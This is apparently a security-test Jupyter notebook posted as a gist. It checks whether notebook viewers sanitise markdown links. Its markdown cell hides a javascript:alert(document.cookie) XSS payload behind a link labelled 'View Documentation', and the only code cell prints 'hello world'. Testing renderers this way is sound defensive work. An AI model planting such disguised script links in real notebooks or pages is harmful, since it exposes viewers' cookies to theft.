Last active 21 hours ago

xss_test.ipynb Raw
{
  "cells": [
    {
      "cell_type": "markdown",
      "metadata": {},
      "source": [
        "# Security Test Notebook\n",
        "\n",
        "Click the link below for documentation:\n",
        "\n",
        "[View Documentation](javascript:alert(document.cookie))\n",
        "\n",
        "This tests markdown rendering in Jupyter notebook viewers."
      ]
    },
    {
      "cell_type": "code",
      "execution_count": 1,
      "metadata": {},
      "outputs": [],
      "source": [
        "print('hello world')"
      ]
    }
  ],
  "metadata": {
    "kernelspec": {
      "display_name": "Python 3",
      "language": "python",
      "name": "python3"
    },
    "language_info": {
      "name": "python",
      "version": "3.9.0"
    }
  },
  "nbformat": 4,
  "nbformat_minor": 4
}